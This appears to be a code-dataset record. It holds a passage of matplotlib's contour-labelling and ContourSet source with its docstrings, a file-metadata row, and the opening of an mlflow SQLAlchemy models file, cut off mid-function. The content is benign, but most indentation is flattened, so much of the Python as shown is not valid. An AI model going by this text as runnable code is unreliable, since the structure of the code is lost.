- if *None*, the color of each label matches the color of
the corresponding contour
- if one string color, e.g. *colors* = 'r' or *colors* =
'red', all labels will be plotted in this color
- if a tuple of matplotlib color args (string, float, rgb, etc),
different labels will be plotted in different colors in the order
specified
*inline*:
controls whether the underlying contour is removed or
not. Default is *True*.
*inline_spacing*:
space in pixels to leave on each side of label when
placing inline. Defaults to 5. This spacing will be
exact for labels at locations where the contour is
straight, less so for labels on curved contours.
*fmt*:
a format string for the label. Default is '%1.3f'
Alternatively, this can be a dictionary matching contour
levels with arbitrary strings to use for each contour level
(i.e., fmt[level]=string)
*manual*:
if *True*, contour labels will be placed manually using
mouse clicks. Click the first button near a contour to
add a label, click the second button (or potentially both
mouse buttons at once) to finish adding labels. The third
button can be used to remove the last label added, but
only if labels are not inline. Alternatively, the keyboard
can be used to select label locations (enter to end label
placement, delete or backspace act like the third mouse button,
and any other key will select a label location).
.. plot:: mpl_examples/pylab_examples/contour_demo.py
"""
"""
NOTES on how this all works:
clabel basically takes the input arguments and uses them to
add a list of "label specific" attributes to the ContourSet
object. These attributes are all of the form label* and names
should be fairly self explanatory.
Once these attributes are set, clabel passes control to the
labels method (case of automatic label placement) or
BlockingContourLabeler (case of manual label placement).
"""
fontsize = kwargs.get('fontsize', None)
inline = kwargs.get('inline', 1)
inline_spacing = kwargs.get('inline_spacing', 5)
self.labelFmt = kwargs.get('fmt', '%1.3f')
_colors = kwargs.get('colors', None)
# Detect if manual selection is desired and remove from argument list
self.labelManual=kwargs.get('manual',False)
if len(args) == 0:
levels = self.levels
indices = range(len(self.levels))
elif len(args) == 1:
levlabs = list(args[0])
indices, levels = [], []
for i, lev in enumerate(self.levels):
if lev in levlabs:
indices.append(i)
levels.append(lev)
if len(levels) < len(levlabs):
msg = "Specified levels " + str(levlabs)
msg += "\n don't match available levels "
msg += str(self.levels)
raise ValueError(msg)
else:
raise TypeError("Illegal arguments to clabel, see help(clabel)")
self.labelLevelList = levels
self.labelIndiceList = indices
self.labelFontProps = font_manager.FontProperties()
if fontsize == None:
font_size = int(self.labelFontProps.get_size_in_points())
else:
if type(fontsize) not in [int, float, str]:
raise TypeError("Font size must be an integer number.")
# Can't it be floating point, as indicated in line above?
else:
if type(fontsize) == str:
font_size = int(self.labelFontProps.get_size_in_points())
else:
self.labelFontProps.set_size(fontsize)
font_size = fontsize
self.labelFontSizeList = [font_size] * len(levels)
if _colors == None:
self.labelMappable = self
self.labelCValueList = np.take(self.cvalues, self.labelIndiceList)
else:
cmap = colors.ListedColormap(_colors, N=len(self.labelLevelList))
self.labelCValueList = range(len(self.labelLevelList))
self.labelMappable = cm.ScalarMappable(cmap = cmap,
norm = colors.NoNorm())
#self.labelTexts = [] # Initialized in ContourSet.__init__
#self.labelCValues = [] # same
self.labelXYs = []
if self.labelManual:
print 'Select label locations manually using first mouse button.'
print 'End manual selection with second mouse button.'
if not inline:
print 'Remove last label by clicking third mouse button.'
blocking_contour_labeler = BlockingContourLabeler(self)
blocking_contour_labeler(inline,inline_spacing)
else:
self.labels(inline,inline_spacing)
        # Hold on to some old attribute names. These are deprecated and will
# be removed in the near future (sometime after 2008-08-01), but keeping
# for now for backwards compatibility
self.cl = self.labelTexts
self.cl_xy = self.labelXYs
self.cl_cvalues = self.labelCValues
self.labelTextsList = cbook.silent_list('text.Text', self.labelTexts)
return self.labelTextsList
def print_label(self, linecontour,labelwidth):
"if contours are too short, don't plot a label"
lcsize = len(linecontour)
if lcsize > 10 * labelwidth:
return 1
xmax = np.amax(linecontour[:,0])
xmin = np.amin(linecontour[:,0])
ymax = np.amax(linecontour[:,1])
ymin = np.amin(linecontour[:,1])
lw = labelwidth
if (xmax - xmin) > 1.2* lw or (ymax - ymin) > 1.2 * lw:
return 1
else:
return 0
def too_close(self, x,y, lw):
"if there's a label already nearby, find a better place"
if self.labelXYs != []:
dist = [np.sqrt((x-loc[0]) ** 2 + (y-loc[1]) ** 2)
for loc in self.labelXYs]
for d in dist:
if d < 1.2*lw:
return 1
else: return 0
else: return 0
def get_label_coords(self, distances, XX, YY, ysize, lw):
""" labels are ploted at a location with the smallest
dispersion of the contour from a straight line
unless there's another label nearby, in which case
the second best place on the contour is picked up
if there's no good place a label isplotted at the
beginning of the contour
"""
hysize = int(ysize/2)
adist = np.argsort(distances)
for ind in adist:
x, y = XX[ind][hysize], YY[ind][hysize]
if self.too_close(x,y, lw):
continue
else:
return x,y, ind
ind = adist[0]
x, y = XX[ind][hysize], YY[ind][hysize]
return x,y, ind
def get_label_width(self, lev, fmt, fsize):
"get the width of the label in points"
if cbook.is_string_like(lev):
lw = (len(lev)) * fsize
else:
lw = (len(self.get_text(lev,fmt))) * fsize
return lw
def get_real_label_width( self, lev, fmt, fsize ):
"""
This computes actual onscreen label width.
This uses some black magic to determine onscreen extent of non-drawn
label. This magic may not be very robust.
"""
# Find middle of axes
xx = np.mean( np.asarray(self.ax.axis()).reshape(2,2), axis=1 )
# Temporarily create text object
t = text.Text( xx[0], xx[1] )
self.set_label_props( t, self.get_text(lev,fmt), 'k' )
# Some black magic to get onscreen extent
# NOTE: This will only work for already drawn figures, as the canvas
# does not have a renderer otherwise. This is the reason this function
# can't be integrated into the rest of the code.
bbox = t.get_window_extent(renderer=self.ax.figure.canvas.renderer)
# difference in pixel extent of image
lw = np.diff(bbox.corners()[0::2,0])[0]
return lw
def set_label_props(self, label, text, color):
"set the label properties - color, fontsize, text"
label.set_text(text)
label.set_color(color)
label.set_fontproperties(self.labelFontProps)
label.set_clip_box(self.ax.bbox)
def get_text(self, lev, fmt):
"get the text of the label"
if cbook.is_string_like(lev):
return lev
else:
if isinstance(fmt,dict):
return fmt[lev]
else:
return fmt%lev
def locate_label(self, linecontour, labelwidth):
"""find a good place to plot a label (relatively flat
part of the contour) and the angle of rotation for the
text object
"""
nsize= len(linecontour)
if labelwidth > 1:
xsize = int(np.ceil(nsize/labelwidth))
else:
xsize = 1
if xsize == 1:
ysize = nsize
else:
ysize = labelwidth
XX = np.resize(linecontour[:,0],(xsize, ysize))
YY = np.resize(linecontour[:,1],(xsize, ysize))
#I might have fouled up the following:
yfirst = YY[:,0].reshape(xsize, 1)
ylast = YY[:,-1].reshape(xsize, 1)
xfirst = XX[:,0].reshape(xsize, 1)
xlast = XX[:,-1].reshape(xsize, 1)
s = (yfirst-YY) * (xlast-xfirst) - (xfirst-XX) * (ylast-yfirst)
L = np.sqrt((xlast-xfirst)**2+(ylast-yfirst)**2).ravel()
dist = np.add.reduce(([(abs(s)[i]/L[i]) for i in range(xsize)]),-1)
x,y,ind = self.get_label_coords(dist, XX, YY, ysize, labelwidth)
#print 'ind, x, y', ind, x, y
# There must be a more efficient way...
lc = [tuple(l) for l in linecontour]
dind = lc.index((x,y))
#print 'dind', dind
#dind = list(linecontour).index((x,y))
return x, y, dind
def calc_label_rot_and_inline( self, slc, ind, lw, lc=None, spacing=5 ):
"""
This function calculates the appropriate label rotation given
the linecontour coordinates in screen units, the index of the
label location and the label width.
It will also break contour and calculate inlining if *lc* is
not empty (lc defaults to the empty list if None). *spacing*
is the space around the label in pixels to leave empty.
Do both of these tasks at once to avoid calling mlab.path_length
multiple times, which is relatively costly.
The method used here involves calculating the path length
along the contour in pixel coordinates and then looking
approximately label width / 2 away from central point to
determine rotation and then to break contour if desired.
"""
if lc is None: lc = []
# Half the label width
hlw = lw/2.0
# Check if closed and, if so, rotate contour so label is at edge
closed = mlab.is_closed_polygon(slc)
if closed:
slc = np.r_[ slc[ind:-1], slc[:ind+1] ]
if len(lc): # Rotate lc also if not empty
lc = np.r_[ lc[ind:-1], lc[:ind+1] ]
ind = 0
# Path length in pixel space
pl = mlab.path_length(slc)
pl = pl-pl[ind]
# Use linear interpolation to get points around label
xi = np.array( [ -hlw, hlw ] )
if closed: # Look at end also for closed contours
dp = np.array([pl[-1],0])
else:
dp = np.zeros_like(xi)
ll = mlab.less_simple_linear_interpolation( pl, slc, dp+xi,
extrap=True )
# get vector in pixel space coordinates from one point to other
dd = np.diff( ll, axis=0 ).ravel()
# Get angle of vector - must be calculated in pixel space for
# text rotation to work correctly
if np.all(dd==0): # Must deal with case of zero length label
rotation = 0.0
else:
rotation = np.arctan2(dd[1], dd[0]) * 180.0 / np.pi
# Fix angle so text is never upside-down
if rotation > 90:
rotation = rotation - 180.0
if rotation < -90:
rotation = 180.0 + rotation
# Break contour if desired
nlc = []
if len(lc):
# Expand range by spacing
xi = dp + xi + np.array([-spacing,spacing])
# Get indices near points of interest
I = mlab.less_simple_linear_interpolation(
pl, np.arange(len(pl)), xi, extrap=False )
# If those indices aren't beyond contour edge, find x,y
if (not np.isnan(I[0])) and int(I[0])<>I[0]:
xy1 = mlab.less_simple_linear_interpolation(
pl, lc, [ xi[0] ] )
if (not np.isnan(I[1])) and int(I[1])<>I[1]:
xy2 = mlab.less_simple_linear_interpolation(
pl, lc, [ xi[1] ] )
# Make integer
I = [ np.floor(I[0]), np.ceil(I[1]) ]
# Actually break contours
if closed:
# This will remove contour if shorter than label
if np.all(~np.isnan(I)):
nlc.append( np.r_[ xy2, lc[I[1]:I[0]+1], xy1 ] )
else:
# These will remove pieces of contour if they have length zero
if not np.isnan(I[0]):
nlc.append( np.r_[ lc[:I[0]+1], xy1 ] )
if not np.isnan(I[1]):
nlc.append( np.r_[ xy2, lc[I[1]:] ] )
# The current implementation removes contours completely
# covered by labels. Uncomment line below to keep
            # original contour if this is the preferred behavior.
#if not len(nlc): nlc = [ lc ]
return (rotation,nlc)
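        # Worked example of the angle folding above: for dd = (1, 1) the raw angle is
        # 45 degrees and is kept; for dd = (-1, -1) arctan2 gives -135 degrees, which
        # is below -90, so 180 is added and the label is drawn at 45 degrees -- i.e.
        # the text is never upside-down.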
def add_label(self,x,y,rotation,lev,cvalue):
dx,dy = self.ax.transData.inverted().transform_point((x,y))
t = text.Text(dx, dy, rotation = rotation,
horizontalalignment='center',
verticalalignment='center')
color = self.labelMappable.to_rgba(cvalue,alpha=self.alpha)
_text = self.get_text(lev,self.labelFmt)
self.set_label_props(t, _text, color)
self.labelTexts.append(t)
self.labelCValues.append(cvalue)
self.labelXYs.append((x,y))
# Add label to plot here - useful for manual mode label selection
self.ax.add_artist(t)
def pop_label(self,index=-1):
'''Defaults to removing last label, but any index can be supplied'''
self.labelCValues.pop(index)
t = self.labelTexts.pop(index)
t.remove()
def labels(self, inline, inline_spacing):
trans = self.ax.transData # A bit of shorthand
for icon, lev, fsize, cvalue in zip(
self.labelIndiceList, self.labelLevelList, self.labelFontSizeList,
self.labelCValueList ):
con = self.collections[icon]
lw = self.get_label_width(lev, self.labelFmt, fsize)
additions = []
paths = con.get_paths()
for segNum, linepath in enumerate(paths):
lc = linepath.vertices # Line contour
slc0 = trans.transform(lc) # Line contour in screen coords
# For closed polygons, add extra point to avoid division by
# zero in print_label and locate_label. Other than these
# functions, this is not necessary and should probably be
# eventually removed.
if mlab.is_closed_polygon( lc ):
slc = np.r_[ slc0, slc0[1:2,:] ]
else:
slc = slc0
if self.print_label(slc,lw): # Check if long enough for a label
x,y,ind = self.locate_label(slc, lw)
if inline: lcarg = lc
else: lcarg = None
rotation,new=self.calc_label_rot_and_inline(
slc0, ind, lw, lcarg,
inline_spacing )
# Actually add the label
self.add_label(x,y,rotation,lev,cvalue)
# If inline, add new contours
if inline:
for n in new:
# Add path if not empty or single point
if len(n)>1: additions.append( path.Path(n) )
else: # If not adding label, keep old path
additions.append(linepath)
# After looping over all segments on a contour, remove old
# paths and add new ones if inlining
if inline:
del paths[:]
paths.extend(additions)
class ContourSet(cm.ScalarMappable, ContourLabeler):
"""
Create and store a set of contour lines or filled regions.
User-callable method: clabel
Useful attributes:
ax:
the axes object in which the contours are drawn
collections:
a silent_list of LineCollections or PolyCollections
levels:
contour levels
layers:
same as levels for line contours; half-way between
levels for filled contours. See _process_colors method.
"""
def __init__(self, ax, *args, **kwargs):
"""
Draw contour lines or filled regions, depending on
whether keyword arg 'filled' is False (default) or True.
The first argument of the initializer must be an axes
object. The remaining arguments and keyword arguments
are described in ContourSet.contour_doc.
"""
self.ax = ax
self.levels = kwargs.get('levels', None)
self.filled = kwargs.get('filled', False)
self.linewidths = kwargs.get('linewidths', None)
self.linestyles = kwargs.get('linestyles', 'solid')
self.alpha = kwargs.get('alpha', 1.0)
self.origin = kwargs.get('origin', None)
self.extent = kwargs.get('extent', None)
cmap = kwargs.get('cmap', None)
self.colors = kwargs.get('colors', None)
norm = kwargs.get('norm', None)
self.extend = kwargs.get('extend', 'neither')
self.antialiased = kwargs.get('antialiased', True)
self.nchunk = kwargs.get('nchunk', 0)
self.locator = kwargs.get('locator', None)
if (isinstance(norm, colors.LogNorm)
or isinstance(self.locator, ticker.LogLocator)):
self.logscale = True
if norm is None:
norm = colors.LogNorm()
if self.extend is not 'neither':
raise ValueError('extend kwarg does not work yet with log scale')
else:
self.logscale = False
if self.origin is not None: assert(self.origin in
['lower', 'upper', 'image'])
if self.extent is not None: assert(len(self.extent) == 4)
if cmap is not None: assert(isinstance(cmap, colors.Colormap))
if self.colors is not None and cmap is not None:
raise ValueError('Either colors or cmap must be None')
if self.origin == 'image': self.origin = mpl.rcParams['image.origin']
x, y, z = self._contour_args(*args) # also sets self.levels,
# self.layers
if self.colors is not None:
cmap = colors.ListedColormap(self.colors, N=len(self.layers))
if self.filled:
self.collections = cbook.silent_list('collections.PolyCollection')
else:
self.collections = cbook.silent_list('collections.LineCollection')
# label lists must be initialized here
self.labelTexts = []
self.labelCValues = []
kw = {'cmap': cmap}
if norm is not None:
kw['norm'] = norm
cm.ScalarMappable.__init__(self, **kw) # sets self.cmap;
self._process_colors()
_mask = ma.getmask(z)
if _mask is ma.nomask:
_mask = None
if self.filled:
if self.linewidths is not None:
warnings.warn('linewidths is ignored by contourf')
C = _cntr.Cntr(x, y, z.filled(), _mask)
lowers = self._levels[:-1]
uppers = self._levels[1:]
for level, level_upper in zip(lowers, uppers):
nlist = C.trace(level, level_upper, points = 0,
nchunk = self.nchunk)
col = collections.PolyCollection(nlist,
antialiaseds = (self.antialiased,),
edgecolors= 'none',
alpha=self.alpha)
self.ax.add_collection(col)
self.collections.append(col)
else:
tlinewidths = self._process_linewidths()
self.tlinewidths = tlinewidths
tlinestyles = self._process_linestyles()
C = _cntr.Cntr(x, y, z.filled(), _mask)
for level, width, lstyle in zip(self.levels, tlinewidths, tlinestyles):
nlist = C.trace(level, points = 0)
col = collections.LineCollection(nlist,
linewidths = width,
linestyle = lstyle,
alpha=self.alpha)
if level < 0.0 and self.monochrome:
ls = mpl.rcParams['contour.negative_linestyle']
col.set_linestyle(ls)
col.set_label('_nolegend_')
self.ax.add_collection(col, False)
self.collections.append(col)
self.changed() # set the colors
x0 = ma.minimum(x)
x1 = ma.maximum(x)
y0 = ma.minimum(y)
y1 = ma.maximum(y)
self.ax.update_datalim([(x0,y0), (x1,y1)])
self.ax.autoscale_view()
def changed(self):
tcolors = [ (tuple(rgba),) for rgba in
self.to_rgba(self.cvalues, alpha=self.alpha)]
self.tcolors = tcolors
for color, collection in zip(tcolors, self.collections):
collection.set_alpha(self.alpha)
collection.set_color(color)
for label, cv in zip(self.labelTexts, self.labelCValues):
label.set_alpha(self.alpha)
label.set_color(self.labelMappable.to_rgba(cv))
# add label colors
cm.ScalarMappable.changed(self)
def _autolev(self, z, N):
'''
Select contour levels to span the data.
We need two more levels for filled contours than for
        line contours, because for filled contours we need to specify
the lower and upper boundary of each range. For example,
a single contour boundary, say at z = 0, requires only
one contour line, but two filled regions, and therefore
three levels to provide boundaries for both regions.
'''
if self.locator is None:
if self.logscale:
self.locator = ticker.LogLocator()
else:
self.locator = ticker.MaxNLocator(N+1)
self.locator.create_dummy_axis()
zmax = self.zmax
zmin = self.zmin
self.locator.set_bounds(zmin, zmax)
lev = self.locator()
zmargin = (zmax - zmin) * 0.000001 # so z < (zmax + zmargin)
if zmax >= lev[-1]:
lev[-1] += zmargin
if zmin <= lev[0]:
if self.logscale:
lev[0] = 0.99 * zmin
else:
lev[0] -= zmargin
self._auto = True
if self.filled:
return lev
return lev[1:-1]
def _initialize_x_y(self, z):
'''
Return X, Y arrays such that contour(Z) will match imshow(Z)
if origin is not None.
The center of pixel Z[i,j] depends on origin:
if origin is None, x = j, y = i;
if origin is 'lower', x = j + 0.5, y = i + 0.5;
if origin is 'upper', x = j + 0.5, y = Nrows - i - 0.5
If extent is not None, x and y will be scaled to match,
as in imshow.
If origin is None and extent is not None, then extent
will give the minimum and maximum values of x and y.
'''
if z.ndim != 2:
raise TypeError("Input must be a 2D array.")
else:
Ny, Nx = z.shape
if self.origin is None: # Not for image-matching.
if self.extent is None:
return np.meshgrid(np.arange(Nx), np.arange(Ny))
else:
x0,x1,y0,y1 = self.extent
x = np.linspace(x0, x1, Nx)
y = np.linspace(y0, y1, Ny)
return np.meshgrid(x, y)
# Match image behavior:
if self.extent is None:
x0,x1,y0,y1 = (0, Nx, 0, Ny)
else:
x0,x1,y0,y1 = self.extent
dx = float(x1 - x0)/Nx
dy = float(y1 - y0)/Ny
x = x0 + (np.arange(Nx) + 0.5) * dx
y = y0 + (np.arange(Ny) + 0.5) * dy
if self.origin == 'upper':
y = y[::-1]
return np.meshgrid(x,y)
def _check_xyz(self, args):
'''
For functions like contour, check that the dimensions
of the input arrays match; if x and y are 1D, convert
them to 2D using meshgrid.
Possible change: I think we should make and use an ArgumentError
Exception class (here and elsewhere).
'''
# We can strip away the x and y units
x = self.ax.convert_xunits( args[0] )
y = self.ax.convert_yunits( args[1] )
x = np.asarray(x, dtype=np.float64)
y = np.asarray(y, dtype=np.float64)
z = ma.asarray(args[2], dtype=np.float64)
if z.ndim != 2:
raise TypeError("Input z must be a 2D array.")
else: Ny, Nx = z.shape
if x.shape == z.shape and y.shape == z.shape:
return x,y,z
if x.ndim != 1 or y.ndim != 1:
raise TypeError("Inputs x and y must be 1D or 2D.")
nx, = x.shape
ny, = y.shape
if nx != Nx or ny != Ny:
raise TypeError("Length of x must be number of columns in z,\n" +
"and length of y must be number of rows.")
x,y = np.meshgrid(x,y)
return x,y,z
def _contour_args(self, *args):
if self.filled: fn = 'contourf'
else: fn = 'contour'
Nargs = len(args)
if Nargs <= 2:
z = ma.asarray(args[0], dtype=np.float64)
x, y = self._initialize_x_y(z)
elif Nargs <=4:
x,y,z = self._check_xyz(args[:3])
else:
raise TypeError("Too many arguments to %s; see help(%s)" % (fn,fn))
self.zmax = ma.maximum(z)
self.zmin = ma.minimum(z)
if self.logscale and self.zmin <= 0:
z = ma.masked_where(z <= 0, z)
warnings.warn('Log scale: values of z <=0 have been masked')
self.zmin = z.min()
self._auto = False
if self.levels is None:
if Nargs == 1 or Nargs == 3:
lev = self._autolev(z, 7)
else: # 2 or 4 args
level_arg = args[-1]
try:
                    if isinstance(level_arg, int):
lev = self._autolev(z, level_arg)
else:
lev = np.asarray(level_arg).astype(np.float64)
                except (TypeError, ValueError):
raise TypeError(
"Last %s arg must give levels; see help(%s)" % (fn,fn))
if self.filled and len(lev) < 2:
raise ValueError("Filled contours require at least 2 levels.")
# Workaround for cntr.c bug wrt masked interior regions:
#if filled:
# z = ma.masked_array(z.filled(-1e38))
# It's not clear this is any better than the original bug.
self.levels = lev
#if self._auto and self.extend in ('both', 'min', 'max'):
# raise TypeError("Auto level selection is inconsistent "
# + "with use of 'extend' kwarg")
self._levels = list(self.levels)
if self.extend in ('both', 'min'):
self._levels.insert(0, min(self.levels[0],self.zmin) - 1)
if self.extend in ('both', 'max'):
self._levels.append(max(self.levels[-1],self.zmax) + 1)
self._levels = np.asarray(self._levels)
self.vmin = np.amin(self.levels) # alternative would be self.layers
self.vmax = np.amax(self.levels)
if self.extend in ('both', 'min'):
self.vmin = 2 * self.levels[0] - self.levels[1]
if self.extend in ('both', 'max'):
self.vmax = 2 * self.levels[-1] - self.levels[-2]
self.layers = self._levels # contour: a line is a thin layer
if self.filled:
self.layers = 0.5 * (self._levels[:-1] + self._levels[1:])
if self.extend in ('both', 'min'):
self.layers[0] = 0.5 * (self.vmin + self._levels[1])
if self.extend in ('both', 'max'):
self.layers[-1] = 0.5 * (self.vmax + self._levels[-2])
return (x, y, z)
def _process_colors(self):
"""
Color argument processing for contouring.
Note that we base the color mapping on the contour levels,
not on the actual range of the Z values. This means we
don't have to worry about bad values in Z, and we always have
the full dynamic range available for the selected levels.
The color is based on the midpoint of the layer, except for
        the extended end layers.
"""
self.monochrome = self.cmap.monochrome
if self.colors is not None:
i0, i1 = 0, len(self.layers)
if self.extend in ('both', 'min'):
i0 = -1
if self.extend in ('both', 'max'):
i1 = i1 + 1
self.cvalues = range(i0, i1)
self.set_norm(colors.NoNorm())
else:
self.cvalues = self.layers
if not self.norm.scaled():
self.set_clim(self.vmin, self.vmax)
if self.extend in ('both', 'max', 'min'):
self.norm.clip = False
self.set_array(self.layers)
# self.tcolors are set by the "changed" method
def _process_linewidths(self):
linewidths = self.linewidths
Nlev = len(self.levels)
if linewidths is None:
tlinewidths = [(mpl.rcParams['lines.linewidth'],)] *Nlev
else:
if cbook.iterable(linewidths) and len(linewidths) < Nlev:
                linewidths = list(linewidths) * int(np.ceil(float(Nlev) / len(linewidths)))
elif not cbook.iterable(linewidths) and type(linewidths) in [int, float]:
linewidths = [linewidths] * Nlev
tlinewidths = [(w,) for w in linewidths]
return tlinewidths
def _process_linestyles(self):
linestyles = self.linestyles
Nlev = len(self.levels)
if linestyles is None:
tlinestyles = ['solid'] * Nlev
else:
if cbook.is_string_like(linestyles):
tlinestyles = [linestyles] * Nlev
            elif cbook.iterable(linestyles):
                nreps = int(np.ceil(float(Nlev) / len(linestyles)))
                tlinestyles = (list(linestyles) * nreps)[:Nlev]
return tlinestyles
def get_alpha(self):
'''returns alpha to be applied to all ContourSet artists'''
return self.alpha
def set_alpha(self, alpha):
'''sets alpha for all ContourSet artists'''
self.alpha = alpha
self.changed()
contour_doc = """
:func:`~matplotlib.pyplot.contour` and
:func:`~matplotlib.pyplot.contourf` draw contour lines and
filled contours, respectively. Except as noted, function
signatures and return values are the same for both versions.
:func:`~matplotlib.pyplot.contourf` differs from the Matlab
(TM) version in that it does not draw the polygon edges,
because the contouring engine yields simply connected regions
with branch cuts. To draw the edges, add line contours with
calls to :func:`~matplotlib.pyplot.contour`.
call signatures::
contour(Z)
make a contour plot of an array *Z*. The level values are chosen
automatically.
::
contour(X,Y,Z)
*X*, *Y* specify the (*x*, *y*) coordinates of the surface
::
contour(Z,N)
contour(X,Y,Z,N)
    contour up to *N* automatically-chosen levels.
::
contour(Z,V)
contour(X,Y,Z,V)
draw contour lines at the values specified in sequence *V*
::
contourf(..., V)
fill the (len(*V*)-1) regions between the values in *V*
::
contour(Z, **kwargs)
Use keyword args to control colors, linewidth, origin, cmap ... see
below for more details.
*X*, *Y*, and *Z* must be arrays with the same dimensions.
*Z* may be a masked array, but filled contouring may not
handle internal masked regions correctly.
``C = contour(...)`` returns a
:class:`~matplotlib.contour.ContourSet` object.
Optional keyword arguments:
*colors*: [ None | string | (mpl_colors) ]
If *None*, the colormap specified by cmap will be used.
If a string, like 'r' or 'red', all levels will be plotted in this
color.
If a tuple of matplotlib color args (string, float, rgb, etc),
different levels will be plotted in different colors in the order
specified.
*alpha*: float
The alpha blending value
*cmap*: [ None | Colormap ]
A cm :class:`~matplotlib.cm.Colormap` instance or
*None*. If *cmap* is *None* and *colors* is *None*, a
default Colormap is used.
*norm*: [ None | Normalize ]
A :class:`matplotlib.colors.Normalize` instance for
scaling data values to colors. If *norm* is *None* and
*colors* is *None*, the default linear scaling is used.
*origin*: [ None | 'upper' | 'lower' | 'image' ]
If *None*, the first value of *Z* will correspond to the
lower left corner, location (0,0). If 'image', the rc
value for ``image.origin`` will be used.
This keyword is not active if *X* and *Y* are specified in
the call to contour.
*extent*: [ None | (x0,x1,y0,y1) ]
If *origin* is not *None*, then *extent* is interpreted as
in :func:`matplotlib.pyplot.imshow`: it gives the outer
pixel boundaries. In this case, the position of Z[0,0]
is the center of the pixel, not a corner. If *origin* is
*None*, then (*x0*, *y0*) is the position of Z[0,0], and
(*x1*, *y1*) is the position of Z[-1,-1].
This keyword is not active if *X* and *Y* are specified in
the call to contour.
*locator*: [ None | ticker.Locator subclass ]
If *locator* is None, the default
:class:`~matplotlib.ticker.MaxNLocator` is used. The
locator is used to determine the contour levels if they
are not given explicitly via the *V* argument.
*extend*: [ 'neither' | 'both' | 'min' | 'max' ]
Unless this is 'neither', contour levels are automatically
added to one or both ends of the range so that all data
are included. These added ranges are then mapped to the
special colormap values which default to the ends of the
colormap range, but can be set via
:meth:`matplotlib.cm.Colormap.set_under` and
:meth:`matplotlib.cm.Colormap.set_over` methods.
contour-only keyword arguments:
*linewidths*: [ None | number | tuple of numbers ]
If *linewidths* is *None*, the default width in
``lines.linewidth`` in ``matplotlibrc`` is used.
If a number, all levels will be plotted with this linewidth.
If a tuple, different levels will be plotted with different
linewidths in the order specified
*linestyles*: [None | 'solid' | 'dashed' | 'dashdot' | 'dotted' ]
      If *linestyles* is *None*, 'solid' is used.
*linestyles* can also be an iterable of the above strings
specifying a set of linestyles to be used. If this
iterable is shorter than the number of contour levels
it will be repeated as necessary.
If contour is using a monochrome colormap and the contour
level is less than 0, then the linestyle specified
in ``contour.negative_linestyle`` in ``matplotlibrc``
will be used.
contourf-only keyword arguments:
*antialiased*: [ True | False ]
enable antialiasing
*nchunk*: [ 0 | integer ]
If 0, no subdivision of the domain. Specify a positive integer to
divide the domain into subdomains of roughly *nchunk* by *nchunk*
points. This may never actually be advantageous, so this option may
be removed. Chunking introduces artifacts at the chunk boundaries
unless *antialiased* is *False*.
**Example:**
.. plot:: mpl_examples/pylab_examples/contour_demo.py
"""
def find_nearest_contour( self, x, y, indices=None, pixel=True ):
"""
        Finds the contour that is closest to a point. Defaults to
measuring distance in pixels (screen space - useful for manual
contour labeling), but this can be controlled via a keyword
argument.
Returns a tuple containing the contour, segment, index of
segment, x & y of segment point and distance to minimum point.
Call signature::
conmin,segmin,imin,xmin,ymin,dmin = find_nearest_contour(
self, x, y, indices=None, pixel=True )
Optional keyword arguments::
*indices*:
Indexes of contour levels to consider when looking for
nearest point. Defaults to using all levels.
*pixel*:
If *True*, measure distance in pixel space, if not, measure
distance in axes space. Defaults to *True*.
"""
# This function uses a method that is probably quite
# inefficient based on converting each contour segment to
# pixel coordinates and then comparing the given point to
# those coordinates for each contour. This will probably be
# quite slow for complex contours, but for normal use it works
# sufficiently well that the time is not noticeable.
# Nonetheless, improvements could probably be made.
        if indices is None:
indices = range(len(self.levels))
dmin = 1e10
conmin = None
segmin = None
xmin = None
ymin = None
for icon in indices:
con = self.collections[icon]
paths = con.get_paths()
for segNum, linepath in enumerate(paths):
lc = linepath.vertices
# transfer all data points to screen coordinates if desired
if pixel:
lc = self.ax.transData.transform(lc)
ds = (lc[:,0]-x)**2 + (lc[:,1]-y)**2
d = min( ds )
if d < dmin:
dmin = d
conmin = icon
segmin = segNum
imin = mpl.mlab.find( ds == d )[0]
xmin = lc[imin,0]
ymin = lc[imin,1]
return (conmin,segmin,imin,xmin,ymin,dmin)
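# --- Hedged usage sketch (not part of the original module) ---
# The contour_doc string above lists the public contour/contourf call
# signatures. The snippet below is a minimal illustration of those
# signatures through the pyplot interface; the grid size, the levels and
# the output filename are arbitrary choices made for the example.
if __name__ == '__main__':
    import numpy as np
    import matplotlib.pyplot as plt

    # A smooth 2D field on a 100x100 grid.
    x = np.linspace(-3.0, 3.0, 100)
    y = np.linspace(-3.0, 3.0, 100)
    X, Y = np.meshgrid(x, y)
    Z = np.exp(-(X ** 2 + Y ** 2))

    # contourf(X, Y, Z, N): filled contours with N automatically-chosen levels.
    cs_filled = plt.contourf(X, Y, Z, 10)
    # contour(X, Y, Z, V): line contours at the explicit values in V.
    plt.contour(X, Y, Z, [0.2, 0.5, 0.8], colors='k')
    plt.colorbar(cs_filled)
    plt.savefig('contour_example.png')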
| 38.100543 | 85 | 0.564035 |
52ac39d599cc31d8097d3e4f8962cb41a469ed80
| 11,450 |
py
|
Python
|
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
mlflow/store/dbmodels/models.py
|
margaret-databricks/mlflow
|
25dcf038e6a6a6c4e26ff3f55391eaedeeb25293
|
[
"Apache-2.0"
] | null | null | null |
import time
from sqlalchemy.orm import relationship, backref
from sqlalchemy import (
Column, String, Float, ForeignKey, Integer, CheckConstraint,
BigInteger, PrimaryKeyConstraint)
from sqlalchemy.ext.declarative import declarative_base
from mlflow.entities import (
Experiment, RunTag, Metric, Param, RunData, RunInfo,
SourceType, RunStatus, Run, ViewType)
from mlflow.entities.lifecycle_stage import LifecycleStage
Base = declarative_base()
SourceTypes = [
SourceType.to_string(SourceType.NOTEBOOK),
SourceType.to_string(SourceType.JOB),
SourceType.to_string(SourceType.LOCAL),
SourceType.to_string(SourceType.UNKNOWN),
SourceType.to_string(SourceType.PROJECT)
]
RunStatusTypes = [
RunStatus.to_string(RunStatus.SCHEDULED),
RunStatus.to_string(RunStatus.FAILED),
RunStatus.to_string(RunStatus.FINISHED),
RunStatus.to_string(RunStatus.RUNNING)
]
def _create_entity(base, model):
# create dict of kwargs properties for entity and return the initialized entity
config = {}
for k in base._properties():
        # check if it's an mlflow entity and build it
obj = getattr(model, k)
if isinstance(model, SqlRun):
if base is RunData:
# Run data contains list for metrics, params and tags
# so obj will be a list so we need to convert those items
if k == 'metrics':
# only get latest recorded metrics per key
metrics = {}
for o in obj:
